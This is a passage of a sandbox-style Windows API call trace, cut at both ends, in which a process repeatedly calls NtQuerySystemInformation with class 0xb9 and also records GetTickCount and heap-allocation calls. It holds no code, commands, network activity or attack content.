(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f140, Length=0x58, ResultLength=0x0) [0302.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f060, Length=0x38, ResultLength=0x0) [0302.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee90, Length=0x28, ResultLength=0x0) [0302.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee90, Length=0x28, ResultLength=0x0) [0302.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee90, Length=0x28, ResultLength=0x0) [0302.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee90, Length=0x28, ResultLength=0x0) [0302.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef00, Length=0x28, ResultLength=0x0) [0302.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f060, Length=0x38, ResultLength=0x0) [0302.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef80, Length=0x28, ResultLength=0x0) [0302.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef80, Length=0x28, ResultLength=0x0) [0302.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee20, Length=0x20, ResultLength=0x0) [0302.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eda0, Length=0x20, ResultLength=0x0) [0302.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eda0, Length=0x20, ResultLength=0x0) [0302.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eda0, Length=0x20, ResultLength=0x0) [0302.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f060, Length=0x38, ResultLength=0x0) [0302.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f060, Length=0x38, ResultLength=0x0) [0302.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x20, ResultLength=0x0) [0302.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x20, ResultLength=0x0) [0302.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x20, ResultLength=0x0) [0302.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f140, Length=0x58, ResultLength=0x0) [0302.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f060, Length=0x38, ResultLength=0x0) [0302.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee90, Length=0x28, ResultLength=0x0) [0302.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee90, Length=0x28, ResultLength=0x0) [0302.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee90, Length=0x28, ResultLength=0x0) [0302.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee90, Length=0x28, ResultLength=0x0) [0302.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef00, Length=0x28, ResultLength=0x0) [0302.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f060, Length=0x38, ResultLength=0x0) [0302.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef80, Length=0x28, ResultLength=0x0) [0302.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef80, Length=0x28, ResultLength=0x0) [0302.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f060, Length=0x38, ResultLength=0x0) [0302.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x20, ResultLength=0x0) [0302.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x20, ResultLength=0x0) [0302.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x20, ResultLength=0x0) [0302.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x20, ResultLength=0x0) [0302.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f060, Length=0x38, ResultLength=0x0) [0302.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x20, ResultLength=0x0) [0302.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x20, ResultLength=0x0) [0302.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x20, ResultLength=0x0) [0302.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f140, Length=0x58, ResultLength=0x0) [0302.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f020, Length=0x38, ResultLength=0x0) [0302.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x28, ResultLength=0x0) [0302.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x28, ResultLength=0x0) [0302.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x28, ResultLength=0x0) [0302.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x28, ResultLength=0x0) [0302.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eed0, Length=0x28, ResultLength=0x0) [0302.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f020, Length=0x38, ResultLength=0x0) [0302.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f020, Length=0x38, ResultLength=0x0) [0302.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef50, Length=0x28, ResultLength=0x0) [0302.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef50, Length=0x28, ResultLength=0x0) [0302.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f020, Length=0x38, ResultLength=0x0) [0302.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f020, Length=0x38, ResultLength=0x0) [0302.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217edc0, Length=0x20, ResultLength=0x0) [0302.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed40, Length=0x20, ResultLength=0x0) [0302.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed40, Length=0x20, ResultLength=0x0) [0302.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed40, Length=0x20, ResultLength=0x0) [0302.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef90, Length=0x20, ResultLength=0x0) [0302.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f020, Length=0x38, ResultLength=0x0) [0302.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eeb0, Length=0x20, ResultLength=0x0) [0302.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee30, Length=0x20, ResultLength=0x0) [0302.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee30, Length=0x20, ResultLength=0x0) [0302.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee30, Length=0x20, ResultLength=0x0) [0302.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f020, Length=0x38, ResultLength=0x0) [0302.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eeb0, Length=0x20, ResultLength=0x0) [0302.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee30, Length=0x20, ResultLength=0x0) [0302.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee30, Length=0x20, ResultLength=0x0) [0302.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee30, Length=0x20, ResultLength=0x0) [0302.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f020, Length=0x38, ResultLength=0x0) [0302.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eeb0, Length=0x20, ResultLength=0x0) [0302.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee40, Length=0x20, ResultLength=0x0) [0302.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee40, Length=0x20, ResultLength=0x0) [0302.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f3c0, Length=0x20, ResultLength=0x0) [0302.286] GetTickCount () returned 0x118b851 [0302.286] GetProcessHeap () returned 0x269489b0000 [0302.287] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x18) returned 0x26949842e40 [0302.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f170, Length=0x30, ResultLength=0x0) [0302.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f070, Length=0x38, ResultLength=0x0) [0302.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f070, Length=0x38, ResultLength=0x0) [0302.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f070, Length=0x38, ResultLength=0x0) [0302.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eff0, Length=0x30, ResultLength=0x0) [0302.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef60, Length=0x38, ResultLength=0x0) [0302.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eec0, Length=0x30, ResultLength=0x0) [0302.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f070, Length=0x38, ResultLength=0x0) [0302.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f070, Length=0x38, ResultLength=0x0) [0302.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efb0, Length=0x30, ResultLength=0x0) [0302.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef10, Length=0x20, ResultLength=0x0) [0302.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efb0, Length=0x30, ResultLength=0x0) [0302.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eef0, Length=0x30, ResultLength=0x0) [0302.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f070, Length=0x38, ResultLength=0x0) [0302.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 